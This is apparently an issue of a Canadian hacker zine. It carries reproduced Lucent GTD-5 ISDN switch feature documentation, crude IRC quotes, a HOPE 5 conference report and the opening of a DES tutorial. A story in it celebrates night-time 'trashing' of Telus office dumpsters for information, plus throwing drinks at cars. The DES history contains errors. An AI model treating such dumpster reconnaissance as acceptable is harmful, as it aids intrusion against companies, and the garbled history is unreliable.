to associate several DNs across the packet network to limit access to other
parts of the network or to prevent other parts of the network from accessing
the CUG. A DN can be assigned to one preferred CUG and up to 99 additional
CUGs. Three types of CUGs are provided:
o CUG. The basic CUG allows packet calls to be sent to or received from
subscribers in the same CUG.
o CUG with Outgoing Access (CUG/OA). CUG/OA allows packet calls to be
originated to subscribers not in any CUG, to packet subscribers assigned to
CUG with Incoming Access, or to subscribers with the indicated CUG included
in their subscription list.
o CUG with Incoming Access (CUG/IA). CUG/IA allows packet calls to be
terminated if the call was received from a subscriber not in any CUG, from
any other CUG subscribed by the called DN if CUG with Outgoing Access is
indicated, or from a subscriber with the indicated CUG included in the
terminating X.25 incoming call packet that is also subscribed to the terminating
subscriber.
BRI Packet features available in GTD-5 SVR 4000 and later releases.
BRI Packet Closed User Groups (CUGs) is available in GTD-5 SVR 4001 and later
releases.
APPLICATIONS - ISDN BRI CPE
Vendor-specific proprietary equipment limit the ability to provide features
and services to the customers. GTD-5 ISDN BRI resolves this problem by
providing an "open interface" that allow the customers to connect
industry standard BRI CPE to their GTD-5 BRI digital subscriber lines. There
are many advantages to using industry standard BRI CPE including standard
interface, numerous BRI CPE vendors to choose from, integrated voice and data,
PC "Plug and Play" capable, and higher speed data connections.
APPLICATIONS - ISDN BRI DIGITAL CENTREX SERVICES
Centrex features and services have been available for many years. However,
these features were limited to analog lines or vendor-specific digital
telephone instruments. Over the years, analog Centrex features have gained
user acceptance. However, many user feel uncomfortable with the numerous
feature access, account, and authorization codes that need to be keyed in to
use analog Centrex features. Digital telephone sets made Centrex features
easier to use. Feature buttons replaced the need to key in Centrex feature
codes. However, most customer premise equipment (CPE) available to Centrex
users have proprietary (non-standard) interfaces. These sets only work with
the vendor's own switching system. They do not work on other vendor's switching
systems. Many customers complained when they found out that a Centrex setup
that they were familiar with using could not be replicated across town because
the two locations are served by different vendor switching systems.
GTD-5 ISDN BRI Digital Centrex solves both of these problems. First, ISDN BRI
digital instruments are easy to use. Centrex features can be programmed on
"feature button" soft keys. Users do not need to remember numerous Centrex
feature codes. Second, GTD-5 ISDN BRI is compliant with National ISDN (NI2)
standards. Any ISDN BRI customer premise equipment (CPE) that meets NI2
standards will work with the GTD-5. This allows customers to use the ISDN
BRI equipment they are familiar with using.
Your customers will gain from the numerous advantages and benefits that GTD-5
ISDN BRI Digital Centrex brings to them.
* Operation of ISDN BRI Digital CENTREX features is consistent with current
analog GTD-5 CENTREX features.
* Customers can choose BRI phones and other CPE that meet their needs.
* GTD-5 BRI Digital Centrex is integrated within the current GTD-5 EAX
customer group structure, operations, provisioning, billing, maintenance,
and administration.
* Does not require a subscriber directory number change to upgrade analog
Centrex customers to GTD-5 BRI Digital Centrex.
Available in GTD-5 SVR 4000 and later releases.
For additional feature availability information, contact your Lucent
representative.
For technical specifications see the GTD-5 CD ROM.
APPLICATIONS - ISDN BRI INTERNET ACCESS
The recent "explosion" of the Internet is providing people with instant
access to information. However, many customers complain about the problems
with accessing the Internet:
* Waiting for Web sites to download large amounts of data (graphics, sound,
animation, video)
* Tying up the analog phone line (can't accept or make phone calls while
browsing the Net)
* Waiting for the analog modem to connect and synchronize
With GTD-5 ISDN BRI, your customers can take advantage of:
* Larger bandwidth than traditional analog modems
* Second line availability
* Faster call setup than traditional analog modems
* Real 128Kbps, not pseudo 56Kbps
Also, ISDN BRI Terminal Adapters (also known as ISDN Modems) are widely
available through various computer and electronic retail and catalog outlets.
Available in GTD-5 SVR 4000 and later releases.
APPLICATIONS - ISDN BRI D-CHANNEL PACKET SERVICES
Packet switched services allow Telus to provide "on-demand" data communications
services to their customers. There are several applications for GTD-5 ISDN BRI
D-Channel Packet services:
Credit Card Validation - validations over analog lines can take 40 seconds
or longer. If retailer has only one phone line, they can't accept calls
during credit card validation (or vice versa). This could lead to the loss
of sales if customers waiting in line decide to leave, or the retailer can't
accept an incoming call from a potential new customer.
Benefits with GTD-5 ISDN BRI D-Channel Packet:
* Credit card validations up to 80% faster (seven seconds or less)
* Incoming/outgoing calls are accepted during the credit card transaction
Lottery Point Of Sale - Dedicated data facility access between a Lottery
Point of Sale (POS) terminal and the Host Computer is inefficient. The number
of transactions per hour vary greatly each day depending on: time of day,
date of the next lottery drawing, and amount of the next lottery jackpot.
Benefits with GTD-5 ISDN BRI D-Channel Packet:
* D-Channel packet switched connection is only established during a transaction
* Switched facilities are more cost-effective than dedicated facilities
Available in GTD-5 SVR 4000 and later releases.
APPLICATIONS - ISDN BRI TELECOMMUTING/HOME OFFICE
Many factors are driving the increasing trend in telecommuting:
* Low-cost, more powerful personal computers
* Corporate trends: corporations without walls, balancing work and home life
* Government mandates (such as Clean Air initiatives)
GTD-5 ISDN BRI has several advantages for telecommuters when compared to
analog lines:
* Two connections (voice and data) over the same physical line
* Place and receive telephone calls while accessing remote computer systems
* Higher speed data connections: 64 Kbps, 128 Kbps with CPE two B-channel
bonding
* FAX and voice line can use the same Directory Number
Available in GTD-5 SVR 4000 and later releases.
APPLICATIONS - ISDN BRI VIDEO CONFERENCING
Use of Video Conferencing is increasing due to the following factors:
* Lower equipment costs
* Corporate work groups are becoming more geographically distributed
* Telecommuting is becoming more accepted
Your customers can use GTD-5 ISDN BRI with industry standard video conferencing
equipment to provide the following services:
* Desktop Video Conferencing for Telecommuters
* Video Conferencing with Application and Data Sharing
* On-Demand Distance Learning
Also, it is more cost effective to provide video conferencing services over
ISDN BRI switched data facilities (pay when used) when compared to dedicated
data access (monthly service charge).
Available in GTD-5 SVR 4000 and later releases.
OAM&P FEATURES - AUTO SPID
Part Number: N/A
This feature simplifies subscriber terminal installation by automatically
providing a Service Provider Identifier (SPID). The Automated SPID Selection
(Auto-SPID) capability automates the terminal initialization procedures by
having the GTD-5 EAX send the SPID to the terminal, instead of having the
user manually enter the SPID. Whenever possible, this service completely
removes the user from the SPID selection process by having the terminal
eliminate SPIDs that would be invalid.
When only one possible SPID is valid for the terminal (that is, only one
terminal is provisioned for the interface), the terminal automatically selects
this SPID without user interaction. When the terminal receives multiple SPIDs
that may be valid, subscriber interaction is needed from the terminal to
select the correct SPID (that is, the terminal prompts the subscriber to
select the correct DN). In either case, the terminal stores the selected
SPID in non-volatile memory. The terminal uses the selected SPID to request
initialization, to request parameter downloading (if supported), and to
allow for future initializations.
Available in GTD-5 SVR 4000 and later releases.
OAM&P FEATURES - X.25 LOCAL CHARGING PREVENTION
Part Number: N/A
This feature allows an X.25 packet user to control when AMA charging is
applied to the local ISDN user interface. Local charging prevention provides
a user subscription option that prevents originating or terminating packet
call charging at the local BRI interface. When enabled, the packet call is
charged to the other packet user, or blocked if the other user also has
subscribed to X.25 local charging prevention.
Available in GTD-5 SVR 4000 and later releases.
OAM&P FEATURES - BRI LINE MAINTENANCE
Part Number: N/A
BLU BRI line status control, monitoring, and reporting facilities are
provided based on National ISDN specifications. GTD-5 EAX BRI DSL metallic
tests are provided through the use of the Facility Test Unit (FTU) for base
unit-equipped BRI lines and the Small Facility Test Unit (SFT) for RSU-equipped
BRI lines. 4TEL ACCESS tests are also provided for BRI lines. A BRI Line
Test Facility (BRTF) card provides line transmission performance testing.
The BRTF offers the following functions:
* Pulse Code Modulation (PCM) pattern source (transmits test patterns to a
loop-around-connection point within th
e circuit under test)
* PCM pattern trap (transmits test patterns to a loop-around connection point
within the circuit under test)
Bit Error Rate (BER) calculator (computes test pass/fail results)
The BRTF has a firmware program that provides for digital testing of BRI
lines; otherwise, it is physically the same as the Multipurpose Digital
Service Card (MDSC, FB-16576).
Up to five BRTFs may be equipped in the base unit. They can be used to test
all BRI lines in the central office, whether in Time Switch and Peripheral
Units (TCUs), RSUs, or RDTs. Each card provides up to eight test circuits
(BRTCs), enabling the simultaneous testing of multiple lines.
Test Network Termination 1 (NT1) devices may be equipped in the GTD-5 EAX.
During BRI Line (BRIL) maintenance testing, switch based NT1s may be used in
place of the customer's NT1 to help isolate faults and verify BRIL transmission
performance. Switch based NT1s are metallically switched through the FTU's
metallic test bus to the BRIL being tested.
Available in GTD-5 SVR 4000 and later releases.
OAM&P FEATURES - BRI PACKET INTRANETWORK BILLING
Part Number: N/A
This feature provides AMA reporting for intra-network packet data calls.
Packet intra-network billing allows the GTD-5 EAX to provide per-call AMA
recording for BRI packet calls between a GTD-5 EAX BRI user and another
packet user on the same GTD-5 EAX or another ISDN switch in the same X.75'
packet network. Packet usage charges can be billed to the originator or
terminator based on a combination of subscription and user-provided X.25
utilities in the X.25 call setup request. Packet intra-network billing can
be enabled/disabled on an X.75' trunk group basis. Billing can be
enabled/disabled for packet calls on a per-DN basis.
Available in GTD-5 SVR 4001 and later releases.
OAM&P FEATURES - BRI REPORT
Part Number: N/A
This report provides a BRI subscriber with service traffic measurements,
enabling the subscriber to observe specified BRI directory numbers. The
selection is made by entering the directory numbers to be studied.
Available in GTD-5 SVR 4000 and later releases.
OAM&P FEATURES - RDT BASED BRI LINE MAINTENANCE
Part Number: N/A
Remote Digital Terminal (RDT)-based Basic Rate Interface (BRI) line
maintenance is provided as specified Base Unit and RSU for BRI Line Unit
(BLU) lines with the following exceptions:
* On-demand and routine metallic testing of RDT BRI lines is limited to
those capabilities provided by an external Remote Measurement Unit (RMU)
located at the RDT.
* The Test Network Termination 1 (NT1) feature is not supported.
* Some Digital Subscriber Line (DSL) tests may differ from BLU-based operation
because of differences in the implementation of the RDT manufacturer's BRI
channel units and software.
Available in GTD-5 SVR 4000 and later releases.
OAM&P FEATURES - SINGLE AMA FOR INTRANETWORK MULTIVENDOR PACKET CALLS
Part Number: N/A
This capability provides a common interface for circuit-switched call AMA
and AMA for intra-network packet calls. AMA recording for intra-network BRI
packet data calls and circuit-switched voice or data calls are combined to
the same AMA port.
Available in GTD-5 SVR 4001 and later releases.
OAM&P FEATURES - BRI TERMINAL PARAMENTER DOWNLOADING
Part Number: N/A
This feature allows the BRI subscriber to download parameters such as DNs
from the GTD-5 EAX to the terminal, simplifying terminal installation.
Terminal Parameter Downloading minimizes manual terminal programming at
installation that can create service problems because of mismatches between
the data in the switch and the terminal's subscriber interface. This feature
minimizes the likelihood of error by ensuring that data installed in the
switch is the basis for the data that is sent to the terminal when it is
downloaded.
Available in GTD-5 SVR 4000 and later releases.
OAM&P FEATURES - BRI TESTS
Part Number: N/A
Three tests for BRI lines are the bit error test, the cyclic redundancy
check (CRC), and the release loopback request. The bit error test performs a
loopback on the BRI line and uses the BRI test circuit (BRTC) to establishes
a bit error rate test on each B-channel while a D-channel test is being
performed by the BRI Master Card (BRIM) or QDLC firmware. The CRC test causes
corrupt CRCs to be sent to every ISDN superframe. After the test, the line
performance data is retrieved. The release loopback request attempts to
release a stuck or forgotten loopback condition on the BRI line.
Interrupt Routine Test Call to Support Subscriber's Originating Call on Same
BRI Interface
This feature interrupts and clears an in-progress routine test call to
utilize its test call resources for supporting a new BRI call origination on
the associated BRI interface.
A routine test call can be interrupted when the new (interrupting) originating
call requires a dynamic relative call slot, and none are available. This
capability enables a BRI subscriber's call origination to be supported once
an in-progress routine test call is interrupted and its associated call
resources (that is, a dynamic relative call slot) are cleared for reuse for
the BRI subscriber's call.
BRI Verification and Testing. The Office Equipment Verification (BRIV-OE)
function provides a display of the hardware address of the line termination
at the switch. The Digital Loopback Testing (BRIV-108) function provides a
non-inverting digital loopback at the switch so the bit error rate testing
can be performed with test equipment at the subscriber's end of the line.
Available in GTD-5 SVR 4000 and later releases.
OAM&P FEATURES - X.75 AND X.75' UTILITY SUPPORT
Part Number:
This feature provides support for the X.75 and X.75' network utilities
associated with AMA recording for intra-network packet calls.
Included in each X.75' packet call request between the GTD-5 EAX and the
external packet switch is a set of utilities that convey information relating
to the type of call, services requested, etc. The X.75' access characteristics
utility is added by this feature to facilitate recording of the following
AMA data for intra-network X.25 packet calls:
* Originating Sensor Identifier (BOC AMA Table 170)
* Originating Service Type (AMA Table 178)
* Terminating Sensor Identifier (AMA table 171)
* Terminating Service Type (AMA Table 179)
Available in GTD-5 SVR 4000 and later releases.
VOICE FEATURES - BRI ADDITIONAL CALL OFFERING
Part Number: N/A
This feature is similar to Call Waiting Terminating, but with a few additional
capabilities. Additional Call Offering notifies a BRI subscriber of incoming
calls for a particular DN/call type when all the B-channels for that particular
combination are busy. Without this feature, those calls receive busy treatment.
With Additional Call Offering, the subscriber has the option to:
* Reject the waiting call
* Not answer the waiting call
* Answer the waiting call after freeing up a B-channel
Additional Call Offering is supported for voice and data non-EKTS DN/call types.
The Additional Call Offering capability is inherent for EKTS; it cannot be
provisioned.
A BRI terminal can support more than one call to the hunt group using the
Additional Call Offering (ACO) or Electronic Key Telephone Service (EKTS)
feature.
VOICE FEATURES - BASIC CALL CONTROL CIRCUIT-SWITCHED SERVICES
Part Number: N/A
This feature provides BRI Basic Call Control Circuit-Switched Services to
BRI subscribers. BRI Basic Call Control Circuit-Switched Services provide
the voice and data call types between ISDN to ISDN, non-ISDN to ISDN, and
ISDN to non-ISDN subscribers using out-of-band signaling on the D-channel.
Available in GTD-5 SVR 4000 and later releases.
VOICE FEATURES - CALLING NUMBER/NAME ID
Part Number: N/A
This feature provides Calling Number/Name services for a BRI subscriber.
ISDN Calling Number Identification Services (I-CNIS) handles calling number
processing on ISDN and provides the following component features:
* Number Provision
* Number Screening
* Number Privacy (calling number delivery blocking)
* Number Delivery
ISDN Calling Name Identification Services (I-CNAIS) provides calling name
processing and the following features:
* ISDN Calling Name Delivery (I-CNAM)
* ISDN Calling Name Delivery Blocking (I-CNAB)
* ISDN Calling Identity and Suppression (I-CIDS)
Available in GTD-5 SVR 4000 and later releases.
VOICE FEATURES - EKTS
Part Number: N/A
This feature provides Electronic Key Telephone Service (EKTS) capabilities for
BRI subscribers.
EKTS allows a subscriber with BRI to access multiple DNs where the DNs can
be accessed by more than one subscriber (that is, subscribers can access
various DNs from more than one terminal or interface). Two or more subscribers
with access to the same DN can make simultaneous calls on that DN. The GTD-5
EAX supports the Call Appearance Call Handling (CACH) feature whereby a given
terminal may have access from 2 to 32 call appearances of a given DN.
EKTS subscribers have access to all BRI features available on the GTD-5 as
well as the following EKTS-specific sub features:
* Call Appearance Bridging. This subfeature allows a subscriber sharing a DN
appearance to bridge into an existing two-way call to create a three-way
call.
* Intercom Calling. This subfeature allows two or more EKTS subscribers to
have intercom capability, which allows terminal-to-terminal connections
within a subscriber group without associating the call with any DN.
* Bridged Call Exclusion (BCE). This subfeature provides the ability to
block other subscribers who share the DN call appearance from bridging into
the call. BCE is a toggle that allows the subscriber to set or release
privacy on a call using feature buttons.
* DN-Bridging. This subfeature allows a subscriber to bridge two speech
calls, two 3.1 kHz audio calls, or a speech and a 3.1 kHz audio call on
separate call appearances of the same or different DNs to form a three-way
connection.
* Abbreviated or Delayed Ringing Treatment on Incoming Calls. This
subfeature enables a subscriber with the capability to engineer each DN on a
terminal so it can provide either abbreviated ringing treatment or delayed
ringing treatment. The timer that defines when abbreviated ringing should
stop and delayed ringing should start may be defined on either a switch or
customer-group basis.
Available in GTD-5 SVR 4000 and later releases.
VOICE FEATURES - EXECUTIVE OVERRIDE
Part Number: N/A
Executive Override (EOV) allows an analog business group member to break-in
to a call in progress by using a hookswitch flash and dialing the special
feature code.
The EOV feature allows an appropriately classmarked BRI terminal of a
business group to break into an established two-way conversation between an
appropriately classmarked analog station or BRI terminal of the same
business group and an analog station or BRI terminal of the same or a
different business group. The EOV feature is activated on a BRI terminal
by keying in the EOV feature button following the busy tone received after
placing the original call. Both parties in the original two-way conversation
receive a tone as notification that another party is breaking into the
conversation. When the break-in caller disconnects, the original connection
is automatically reestablished.
Can Use Silent Monitor. This feature determines if a line is allowed to
monitor other lines.
Silent Monitor Allowed. This feature determines if a line can be monitored.
The Silent Monitor feature allows an appropriately classmarked member of a
business group to break into an established call without providing a warning
tone and monitor the two-way conversation between two other appropriately
classmarked analog stations and/or any BRI terminal of the same group. The
Silent Monitor feature is accessed by dialing the Silent Monitor Access Code,
then the DN of the monitored analog station or the monitored BRI terminal.
The terminal originating the Silent Monitor call has only receiving
capabilities.
For BRI Lines, available in GTD-5 SVR 4000 and later releases.
For analog lines, available in all commercially available GTD-5 SVRs
VOICE FEATURES - BRI FEATURE KEY MANAGEMENT
Part Number: N/A
This feature provides Feature Key Management for a BRI subscriber.
With Feature Key Management, the subscriber invokes an ISDN feature and
receives status information on the selected feature from the GTD-5 EAX using
ISDN out-of-band D-channel signaling. Feature Key Management consists of two
D-channel components that reduce the complexity of ISDN services, as follows:
* Feature activators, such as pushbuttons and keys, allow the subscriber to
invoke services with a feature activator, rather than by dialing an access
code.
* Feature indicators provide an additional mechanism beyond in-band tones
and/or display information to report the status of a feature to an ISDN
subscriber, such as by flashing lamps.
Available in GTD-5 SVR 4000 and later releases.
HIGH SPEED ACCESS - VOICE FEATURES - BRI FLEXIBLE CALLING
Part Number: N/A
This feature provides BRI subscribers with functions similar to those of
Three-Way Analog Line Call Hold, Progressive Conference Calling, and Call
Transfer.
The BRI Flexible Calling feature includes the following:
* Conference Calling. This feature allows a subscriber to combine calls to
form a conference call. The GTD-5 EAX supports 3-, 8-, 16-, and 24-port
conferences. An ISDN subscriber can subscribe to any number or combination
of conference sizes available. The GTD-5 EAX uses existing three-port
hardware to support three-port conferences and existing conference bridge
hardware to support the other conference sizes.
* Call Transfer. This feature allows a subscriber to transfer a non-conference
call to another subscriber or to a conference call. Call Transfer can also be
used to transfer a conference call to the conferees (a conference cannot be
transferred to a new conference controller).
* Conference Drop. Drops the last party added.
The BRI Call Hold feature allows a BRI subscriber to place a circuit-switched
call or conference call on hold, retrieve a held call from held and to drop
a held call. After a subscriber has placed a call on hold, the subscriber
may then set up a new call, answer incoming calls, or retrieve a held call.
Available in GTD-5 SVR 4000 and later releases.
VOICE FEATURES - INTERACTIONS WITH DIAL ACCESS TO ANALOG POTS FEATURES
Part Number: N/A
This feature now provides dial access to analog POTS features for a BRI
subscriber. Where possible, the current in-band dial access features are
provided for the BRI subscriber using out-of-band D-channel signaling.
Available in GTD-5 SVR 4000 and later releases.
VOICE FEATURES - STATION PRIORITY ENTRY
GTD-5 EAX Features: Station Priority Entry
Part Number: N/A
Station Priority Entry permits a business group member to enter a busy
connection of another member in an emergency, or to deliver an important
message. When a busy signal is received, the calling party uses hookswitch
flash and dials the special feature code (if analog) or depresses the Station
Priority Entry feature button (if BRI). Both parties of the call in progress
receive a warning tone and are connected to the calling party in a three-way
conference call.
The three parties are conferenced for a brief interval (an engineerable
period of up to 60 seconds), and the party originally talking to the called
party is automatically placed on hold. The original connection is reestablished
when the break-in party disconnects.
For BRI Lines, available in GTD-5 SVR 4000 and later releases.
For analog lines, available in all commercially available GTD-5 SVRs.
VOICE FEATURES - BRI SYSTEM DEFAULT
Part Number: N/A
When a BRI line is added prior to a DN assignment, a subscriber can connect
a terminal to that line. The subscriber may then attempt to access basic
services before a DN is assigned to the line. System Default Service allows
a subscriber to make calls to start service (611) or access emergency
service (911). Support of terminals on a BRI that has no specific Terminal
Profiles and DN-associated data is called System Default Service.
Available in GTD-5 SVR 4000 and later releases.
SOFTWARE AND FEATURES
Lucent Technologies' switching systems come with a comprehensive set of
network, OAM&P and subscriber features for enterprise, SOHO, residential and
government end-users. The cost-effective, easy-to-implement applications
allow service providers to maximize network efficiency and meet their
customers' demand for the latest revenue generating services.
Software Releases
Lucent Technologies continually updates the GTD-5 with new features and
services through software releases called system version releases (SVRs).
Delivered electronically by Rapid Feature Delivery (RFD), SVRs allow service
providers to quickly and cost-effectively deploy revenue-generating services
like CLASS and custom calling services as well government-mandated features
like number portability and CALEA.
Thanks to all who read K-1ine, and to those who contribute to it.
*Keep an eye out for Wiring Diagrams, Source Code, and more on the GTD-5EAX
in the future. Thanks again to Clone, whose AWAS phile prompted me to get
after this monster of a document.
End of this big Mo-fuggin Phile
-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-
-
<hades> tek, can we fuck now?
<tek> sick
<tek> hades: k.
<hades> :D
-
-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-
The Nettwerked After Meeting Trashing Adventure
The time was around 1:30am we were sitting at the clones place wondering what
the fuck to do then Jackel came up with the brilliant idea of a night out on
the town, yes that means trashing, we took Fractal's small ass mother fucking
truck out to begin with, only driving for a few minutes before we find a small
local telus office and decide to raid the dumpster, our four heroes, The Clone,
Kankraka, Jackel, and Fractal began ripping grabage bags out of the dumpster and
tearing them apart in the hopes that something amazing lay inside, a few
minutes passed until our heroes heard a car door slam just on the other side of
the parking lot, after a small amount of diliberation they then proceeded to
get back into the small ass truck and return back to The Clone's pimping pad
and get Jackel's super pimping ride and go find some more Telus offices.
Unfortunately while trying to find some more Telus offices The Clone gave
Jackel very poor directions and they some how ended up in St. Albert. After a
small amount of denial our trashing heroes then decided they knew how to get
out of this god forsaken stoner town after a shoft time of going down streets
he had never seen before Jackel has then realized that The Clone had no fucking
clue where he was going either and that the "keep going straight" idea was not
working out for the best. Then taking matters into his own hands Jackel then
proceeded to take a sharp left and continue though several residential areas
until they ended up in a little prefex known as "Lacombe" this just happened
to be the name of Jackel's home town, this scared and confused not only one of
the heroes but the hero that happened to be driving, this scared and confused
him. Meanwhile Kankraka and Fractal where in the back, affectionately known
as the "bitch seat" they both looked ready to piss their pants, whether it had
been from laughing extremely hard, or drinking a fair sized quantity of beer
The Clone and Jackel did not know, after making a series of fucked up turns our
heroes ended up on a gravel road which left The Clone asking "what the fuck?"
Jackel then whipped his truck around and went back into the residential area,
this time around they decided to whip their slurpies at cars, Jackel and
Kankraka made direct hits on a car and a truck, Fractal's cup however just did
a little dance on the box cover, they then rode away into the night, only to
find themselves going in circles passing the same truck and car they had hit
with the slurpies three times. After making their way back onto a main drag
they then stopped at a Shell gas station to ask for directions, the kind
however gothic looking lady behind the counter pointed us in the right
direction and we were then on our way back to the marvelous city of Edmonton,
which seemed like heaven in comparison to St. Albert. On our way back to The
Clone's place we decided to give trashing another try, shortly after trying to
find a small Telus office, we then passed the Main Telus office, it was a gift
from the trashing gods, after pulling into the parking lot and backing the truck
up to the dumpsters the heroes then put about 15 bags of garbage and paper into
the bed of Jackel's truck, but a mishap occurred when Kankraka took the topper
off the wrong way and ripped half of it off the truck. Then we saw about 5
bags suddenly fly into the truck, we turned around to find Fractal running back
and forth like the wind, but looking like a drugged up Rastafarian. A quick and
speedy get away shortly ensued. We then discussed where to tear open the
contents of our findings, the location was to be a School near The Clones
place, but before the crew could get through more than 5 bags a Police
helicopter showed up and began circling the area, The Clone acting like he was
drunk then fingered the police and started to jump up and down, which probably
wasn't the wiseest choice he could have made. The pigs probably more confused
than us at the time just continued the circle while our heroes simply looked up
and laughed at them, then the decision was made to take the bags to a new
location about fifty feet away and continue to hunt for treasure, the remaining
bags were soon emptied and we were back at Clones house going though the
contents of our find which we deemed worthy of our attention, which leaves us
at the present, Fratcal is some how managing to sleep though kankraka's
snoring which is most likely measuring about 80 decibles, The Clone is
sleeping, the Senorita doing god knows what and I, Jackel am here hopped up on
coffee trying to bring this file to a close. That concludes our night out on
the town.
-Jackel
P.S
"Go Straight"
Yeah right, fuck you TC
-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-
-
<theclone> wordpad has a hidden agenda
-
-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-
Hey all-y'all ...(ti-hi! some US guy kept saying that at Hope)... I was asked
to write about my experience at HOPE 5 for K-1ine this year, I though that
would cool to do, So I did (Yay!) and here's my side of the story.
Hope 5: A Salute to Fascism!
NOW, before I begin I want to let everyone know that my title "A Salute to
Fascism" is not a shot against 2600 saying they're fascists (far from it!) It
was actually the theme of the conference this year (one big reason I like going
to HOPE conferences, they always have a cool theme) first of all the badge you
bought to get in was a black arm band, there were big red vertical banners with
the Hope 5 logo in the middle, the podium had a US Government logo but was
changed and said HOPE 5 stuff on it, and probably my favorite part is the
pictures of Big Brother everywhere. The reason why is that the guy who drew the
big brother posters is a montrealer Frederic Guimont (good guy, but needs a
haircut) is actually doing a graphic comic book on the novel 1984;
http://www.1984comic.com - go check that out.
The HOPE conference was really good this time (its only my second time at
HOPE)... the set up of the different areas was impressive, they were well
organized from what I saw (example: for the big keynote speakers like: Steve
Wozniak, if there was no room left in the conference room he was in, you could
of went down to the movie room were he was simulcast live on a big screen, NOw
THATS COOL!). There was a wAN and LAN attached to two T1's to connect With and
Network Room with round-the-clock admins (the connection would go down for 10
minutes max, then POP! Alive again. BRAVO! admins) Usually at the bigger conf's
there's a place to buy "hacker" stuff; books, stickers,Shirts-O-T, videos, and
so much more!!!(blah) I usually buy a few stickers, Not like my buddy the count
(i'm not talking about the clone, its "the count" the organizer of the Ottawa
2600 meetings)fucking guy buys 5 T-shirts cause he didn't pack any clean
clothes, "crap that!" i said, If New York city gonna smells like ass 24/7, then
i'm gonna smell like ass 24/7 TOO!... actually i didn't say that, but New York
does smell like ass 24/7 tho, Its true!...
the talks were cool Like lock picking, phone loser of America, hardware bus
security, AS/400, phreaking in the early days, urban exploration, social
engineering, hacking the grid, Homeland Security, etc... now for the people
reading this article and have been to a hacker conference before, you know that
most speakers don't have much experience with public speaking. So don't expect
the world, but if your patient enough you may learn a thing or two (Hardware
Bus Security was a real Eye Opener for me!). Steve Wozniak's speech was soo
good, it was like? you know when you were a kid and you're cool uncle would
over and tell you some story about Cool trip or some wild party he went to,
you just sit there with giant eyes and open ears and just soak it all in
wishing you were there with him...? well that's how i felt during woz's
speech. Who could have had a cooler life then Steve Wozniak the pioneer of
personal computing and who used to sell blue boxes for profit. I also saw
Jello Biafra and i have to say, when he talks, the crowd listens...
"personally its scARY all the stuff he knows about America politics and
current event. We need a Canadian version of HIM to educate us on the crap
going on in this country?"
New York City in general... Now where do i start. wait i know, I HATE NEW YORK
CITY!!!! there's always traffic, people are rude (...and i'm talking aBOUT
waiters and the cab drivers, not the people on the street) the food isn't that
good and expensive, and it smells "IT FUCKING SMELLS EVERYWHERE!!!"we invented
a game, when we would walk up to a street corner we would place bets then say:
"Name that Smell???" closest to the smell would WIN (evidently!?!) its not all
bad tho, a few things i liked; time square is pretty cool, Bryant park for
chess playing, the sushi is pretty good, our hotel and their staff were nice
and seeing FOX NEWS for the first time in my life made me laugh... Oh yeah? US
CUSTOMS SUCK ASS TOO!!!! (i could write a whole other article on their ass
sucking, but i digress)
...and after all those beers and telling off Americans on my NEW FRS/GMRS
radios i bought at radio shack (sooo much fun) I ran back to Canada (thank the
baby Jesus above they let me back in!!!), and wrote this article. So 'till the
next Hacker conference, this is you're favorite French Canadian saying BYE-BYE
for now...
shouts:
Hope 5 organizers (Many thanks for a great time), Someguy, threugy,
darlene (you always need good ppl to travel with)those two american
guys who stayed with us (the shit they'd say half the time made me
laugh, the other times scared the shit outta me) everyone from the
montreal 2600 who were there (vous est toute une bonne gang de gars,
ont se voie tous aux afterfest 2004, ok!?!?) and to everyone who took
the time to read this (thank you).
Signed, Kybo Ren
-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-
-
<pontifex> Gah. This free porn sucks.
-
-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-
|=============================================================================|
| DISMANTLING DES |
| by aestetix |
|=============================================================================|
Contents:
-Introduction
-History
-Necessary Background Information
-XOR, Permutations and Combinations
-Overview of DES
-Details on key generation
-Details on encryption process
-S-Boxes
-Deciphering DES
-How Secure is DES?
-Cracking Attempts
-EFF's DES Cracking Research
-Conclusion
-------
Introduction
I've been playing with cryptography for years, and have already authored a
series "Fun with Cryptology!" on my website. However, a lot of new
algorithms have emerged, and many people have difficulty understanding
all the math behind them. I've found from experience that once you know
the guts of one algorithm it's easier to learn more, so I decided to go
indepth on how the Data Encryption Standard (DES) works.
History
Why choose DES? A good explanation requires a bit of historical
background. With the multiple variants of Enigma cipher machines in
World War 2 (WW2), we discovered how effective multiple iterations
(repetitions) of a cipher such as substitution was. The Enigma was
essentially multiple alphabet wheels that continuously changed position...
to put it into perspective, imagine a Vigenere tableaux that changed every
time you enciphered a letter.
With the end of WW2, the US government realized that it would be necessary
to establish a new agency to deal with the intelligence operations that had
evolved since the days of Yardley, Friedman, and the American Black
Chamber, so in 1952 Truman signed the National Security Agency (NSA) into
existence. There were a lot of different cryptography algorithms floating
around at the time, and the NSA realized that if their surveilance was
going to be effective they had to establish some kind of standard.
After examining many different ciphers, NSA chose the Feistel cipher,
developed by Horst Feistel and based upon the communications theories Claude
Shannon introduced in his influential 1949 paper "A Mathematical Theory of
Communication". Incidentally, the original name was "DEMONSTRATION", but the
five character filename limit cropped it to "DEMON"; as a pun Feistel called
it "Lucifer", the name it held until its adoption in 1973 as the Data
Encryption Standard, or DES. For more information on pre-1960s cryptology
history and the NSA, check out David Kahn's _The Codebreakers_ and James
Bamford's _The Puzzle Palace_.
But DES's introduction was over 30 years ago, and since then the algorithm
has been analyzed by several groups, and various countermeasures have been
proposed. Why even bother? Well, here's one way to look at it: there are
countless exploits and patches made public for Microsoft Windows everyday,
but the vast majority of system administrators very seldomly "update" with
the latest patches, if ever-- there's too much overhead. Likewise, DES was
a standard for a very long time, and a lot of people are still dependent on
it, and of those the vast majority don't understand how it works. Therefore,
even though by this time some of this information is outdated, it's still
widely applicable, as well as useful to understand post-DES cryptosystems.
Background Information
There are some mathematical concepts that are crucial to understanding
